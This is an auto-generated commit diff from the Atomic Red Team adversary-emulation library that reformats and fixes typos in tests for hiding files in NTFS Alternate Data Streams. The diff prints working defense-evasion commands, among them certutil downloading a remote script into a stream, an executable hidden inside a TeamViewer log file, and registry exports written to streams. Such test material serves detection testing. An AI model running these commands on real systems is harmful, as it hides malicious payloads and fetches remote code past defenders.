Generated docs from job=generate-docs branch=master [ci skip]

atomics/Indexes/index.yaml

@@ -31708,22 +31708,24 @@ defense-evasion:
           type: path
           default: c:\ADS\
       executor:
-        command: "type C:\\temp\\evil.exe > \"C:\\Program Files (x86)\\TeamViewer\\TeamViewer12_Logfile.log:evil.exe\"\nextrac32
-          #{path}\\procexp.cab #{path}\\file.txt:procexp.exe\nfindstr /V /L W3AllLov3DonaldTrump
-          #{path}\\procexp.exe > #{path}\\file.txt:procexp.exe\ncertutil.exe -urlcache
-          -split -f https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1564.004/src/test.ps1
-          c:\\temp:ttt\nmakecab #{path}\\autoruns.exe #{path}\\cabtest.txt:autoruns.cab\nprint
-          /D:#{path}\\file.txt:autoruns.exe #{path}\\Autoruns.exe\nreg export HKLM\\SOFTWARE\\Microsoft\\Evilreg
-          #{path}\\file.txt:evilreg.reg\nregedit /E #{path}\\file.txt:regfile.reg
-          HKEY_CURRENT_USER\\MyCustomRegKey\nexpand \\\\webdav\\folder\\file.bat #{path}\\file.txt:file.bat\nesentutl.exe
-          /y #{path}\\autoruns.exe /d #{path}\\file.txt:autoruns.exe /o \n"
+        command: |
+          type C:\temp\evil.exe > "C:\Program Files (x86)\TeamViewer\TeamViewer12_Logfile.log:evil.exe"
+          extrac32 #{path}\procexp.cab #{path}\file.txt:procexp.exe
+          findstr /V /L W3AllLov3DonaldTrump #{path}\procexp.exe > #{path}\file.txt:procexp.exe
+          certutil.exe -urlcache -split -f https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1564.004/src/test.ps1 c:\temp:ttt
+          makecab #{path}\autoruns.exe #{path}\cabtest.txt:autoruns.cab
+          print /D:#{path}\file.txt:autoruns.exe #{path}\Autoruns.exe
+          reg export HKLM\SOFTWARE\Microsoft\Evilreg #{path}\file.txt:evilreg.reg
+          regedit /E #{path}\file.txt:regfile.reg HKEY_CURRENT_USER\MyCustomRegKey
+          expand \\webdav\folder\file.bat #{path}\file.txt:file.bat
+          esentutl.exe /y #{path}\autoruns.exe /d #{path}\file.txt:autoruns.exe /o
         name: command_prompt
         elevation_required: true
     - name: Store file in Alternate Data Stream (ADS)
       auto_generated_guid: 2ab75061-f5d5-4c1a-b666-ba2a50df5b02
       description: |
         Storing files in Alternate Data Stream (ADS) similar to Astaroth malware.
-        Upon execution cmd will run and attempt to launch desktop.ini. No windows remain open after the test
+        Upon execution, cmd will run and attempt to launch desktop.ini. No windows remain open after the test
       supported_platforms:
       - windows
       input_arguments:
@@ -31776,8 +31778,8 @@ defense-evasion:
     - name: Create ADS PowerShell
       auto_generated_guid: 0045ea16-ed3c-4d4c-a9ee-15e44d1560d1
       description: |
-        Create an Alternate Data Stream with PowerShell. Write access is required. To verify execution, the the command "ls -Recurse | %{ gi $_.Fullname -stream *} | where stream -ne ':$Data' | Select-Object pschildname"
-        in the %temp% direcotry to view all files with hidden data streams. To view the data in the alternate data stream, run "notepad.exe T1564.004_has_ads_powershell.txt:adstest.txt" in the %temp% folder.
+        Create an Alternate Data Stream with PowerShell. Write access is required. To verify execution, run the command "ls -Recurse | %{ gi $_.Fullname -stream *} | where stream -ne ':$Data' | Select-Object pschildname"
+        in the %temp% directory to view all files with hidden data streams. To view the data in the alternate data stream, run "notepad.exe T1564.004_has_ads_powershell.txt:adstest.txt" in the %temp% folder.
       supported_platforms:
       - windows
       input_arguments:
@@ -31811,10 +31813,10 @@ defense-evasion:
         name: powershell
     - name: Create Hidden Directory via $index_allocation
       auto_generated_guid: 3e6791e7-232c-481c-a680-a52f86b83fdf
-      description: "Create an Alternate Data Stream Directory and File with the command
-        prompt. Write access is required. Upon execution, \nrun \"dir /A /Q /R\" in
-        the %temp% folder to view that the alternate data stream folder exists. To
-        view the data in the  \nalternate data stream, run \"type %temp%\\...$.......::$index_allocation\\secrets.txt\"\n"
+      description: |
+        Create an Alternate Data Stream Directory and File with the command prompt. Write access is required. Upon execution,
+        run "dir /A /Q /R" in the %temp% folder to view that the alternate data stream folder exists. To view the data in the
+        alternate data stream, run "type %temp%\...$.......::$index_allocation\secrets.txt"
       supported_platforms:
       - windows
       input_arguments:

atomics/Indexes/windows-index.yaml

@@ -26280,22 +26280,24 @@ defense-evasion:
           type: path
           default: c:\ADS\
       executor:
-        command: "type C:\\temp\\evil.exe > \"C:\\Program Files (x86)\\TeamViewer\\TeamViewer12_Logfile.log:evil.exe\"\nextrac32
-          #{path}\\procexp.cab #{path}\\file.txt:procexp.exe\nfindstr /V /L W3AllLov3DonaldTrump
-          #{path}\\procexp.exe > #{path}\\file.txt:procexp.exe\ncertutil.exe -urlcache
-          -split -f https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1564.004/src/test.ps1
-          c:\\temp:ttt\nmakecab #{path}\\autoruns.exe #{path}\\cabtest.txt:autoruns.cab\nprint
-          /D:#{path}\\file.txt:autoruns.exe #{path}\\Autoruns.exe\nreg export HKLM\\SOFTWARE\\Microsoft\\Evilreg
-          #{path}\\file.txt:evilreg.reg\nregedit /E #{path}\\file.txt:regfile.reg
-          HKEY_CURRENT_USER\\MyCustomRegKey\nexpand \\\\webdav\\folder\\file.bat #{path}\\file.txt:file.bat\nesentutl.exe
-          /y #{path}\\autoruns.exe /d #{path}\\file.txt:autoruns.exe /o \n"
+        command: |
+          type C:\temp\evil.exe > "C:\Program Files (x86)\TeamViewer\TeamViewer12_Logfile.log:evil.exe"
+          extrac32 #{path}\procexp.cab #{path}\file.txt:procexp.exe
+          findstr /V /L W3AllLov3DonaldTrump #{path}\procexp.exe > #{path}\file.txt:procexp.exe
+          certutil.exe -urlcache -split -f https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1564.004/src/test.ps1 c:\temp:ttt
+          makecab #{path}\autoruns.exe #{path}\cabtest.txt:autoruns.cab
+          print /D:#{path}\file.txt:autoruns.exe #{path}\Autoruns.exe
+          reg export HKLM\SOFTWARE\Microsoft\Evilreg #{path}\file.txt:evilreg.reg
+          regedit /E #{path}\file.txt:regfile.reg HKEY_CURRENT_USER\MyCustomRegKey
+          expand \\webdav\folder\file.bat #{path}\file.txt:file.bat
+          esentutl.exe /y #{path}\autoruns.exe /d #{path}\file.txt:autoruns.exe /o
         name: command_prompt
         elevation_required: true
     - name: Store file in Alternate Data Stream (ADS)
       auto_generated_guid: 2ab75061-f5d5-4c1a-b666-ba2a50df5b02
       description: |
         Storing files in Alternate Data Stream (ADS) similar to Astaroth malware.
-        Upon execution cmd will run and attempt to launch desktop.ini. No windows remain open after the test
+        Upon execution, cmd will run and attempt to launch desktop.ini. No windows remain open after the test
       supported_platforms:
       - windows
       input_arguments:
@@ -26348,8 +26350,8 @@ defense-evasion:
     - name: Create ADS PowerShell
       auto_generated_guid: 0045ea16-ed3c-4d4c-a9ee-15e44d1560d1
       description: |
-        Create an Alternate Data Stream with PowerShell. Write access is required. To verify execution, the the command "ls -Recurse | %{ gi $_.Fullname -stream *} | where stream -ne ':$Data' | Select-Object pschildname"
-        in the %temp% direcotry to view all files with hidden data streams. To view the data in the alternate data stream, run "notepad.exe T1564.004_has_ads_powershell.txt:adstest.txt" in the %temp% folder.
+        Create an Alternate Data Stream with PowerShell. Write access is required. To verify execution, run the command "ls -Recurse | %{ gi $_.Fullname -stream *} | where stream -ne ':$Data' | Select-Object pschildname"
+        in the %temp% directory to view all files with hidden data streams. To view the data in the alternate data stream, run "notepad.exe T1564.004_has_ads_powershell.txt:adstest.txt" in the %temp% folder.
       supported_platforms:
       - windows
       input_arguments:
@@ -26383,10 +26385,10 @@ defense-evasion:
         name: powershell
     - name: Create Hidden Directory via $index_allocation
       auto_generated_guid: 3e6791e7-232c-481c-a680-a52f86b83fdf
-      description: "Create an Alternate Data Stream Directory and File with the command
-        prompt. Write access is required. Upon execution, \nrun \"dir /A /Q /R\" in
-        the %temp% folder to view that the alternate data stream folder exists. To
-        view the data in the  \nalternate data stream, run \"type %temp%\\...$.......::$index_allocation\\secrets.txt\"\n"
+      description: |
+        Create an Alternate Data Stream Directory and File with the command prompt. Write access is required. Upon execution,
+        run "dir /A /Q /R" in the %temp% folder to view that the alternate data stream folder exists. To view the data in the
+        alternate data stream, run "type %temp%\...$.......::$index_allocation\secrets.txt"
       supported_platforms:
       - windows
       input_arguments:

atomics/T1564.004/T1564.004.md

@@ -71,7 +71,7 @@ esentutl.exe /y #{path}\autoruns.exe /d #{path}\file.txt:autoruns.exe /o
 
 ## Atomic Test #2 - Store file in Alternate Data Stream (ADS)
 Storing files in Alternate Data Stream (ADS) similar to Astaroth malware.
-Upon execution cmd will run and attempt to launch desktop.ini. No windows remain open after the test
+Upon execution, cmd will run and attempt to launch desktop.ini. No windows remain open after the test
 
 **Supported Platforms:** Windows
 
@@ -153,8 +153,8 @@ del #{file_name} >nul 2>&1
 <br/>
 
 ## Atomic Test #4 - Create ADS PowerShell
-Create an Alternate Data Stream with PowerShell. Write access is required. To verify execution, the the command "ls -Recurse | %{ gi $_.Fullname -stream *} | where stream -ne ':$Data' | Select-Object pschildname"
-in the %temp% direcotry to view all files with hidden data streams. To view the data in the alternate data stream, run "notepad.exe T1564.004_has_ads_powershell.txt:adstest.txt" in the %temp% folder.
+Create an Alternate Data Stream with PowerShell. Write access is required. To verify execution, run the command "ls -Recurse | %{ gi $_.Fullname -stream *} | where stream -ne ':$Data' | Select-Object pschildname"
+in the %temp% directory to view all files with hidden data streams. To view the data in the alternate data stream, run "notepad.exe T1564.004_has_ads_powershell.txt:adstest.txt" in the %temp% folder.
 
 **Supported Platforms:** Windows
 
@@ -206,8 +206,8 @@ New-Item -Path #{file_name} | Out-Null
 <br/>
 
 ## Atomic Test #5 - Create Hidden Directory via $index_allocation
-Create an Alternate Data Stream Directory and File with the command prompt. Write access is required. Upon execution, 
-run "dir /A /Q /R" in the %temp% folder to view that the alternate data stream folder exists. To view the data in the  
+Create an Alternate Data Stream Directory and File with the command prompt. Write access is required. Upon execution,
+run "dir /A /Q /R" in the %temp% folder to view that the alternate data stream folder exists. To view the data in the
 alternate data stream, run "type %temp%\...$.......::$index_allocation\secrets.txt"
 
 **Supported Platforms:** Windows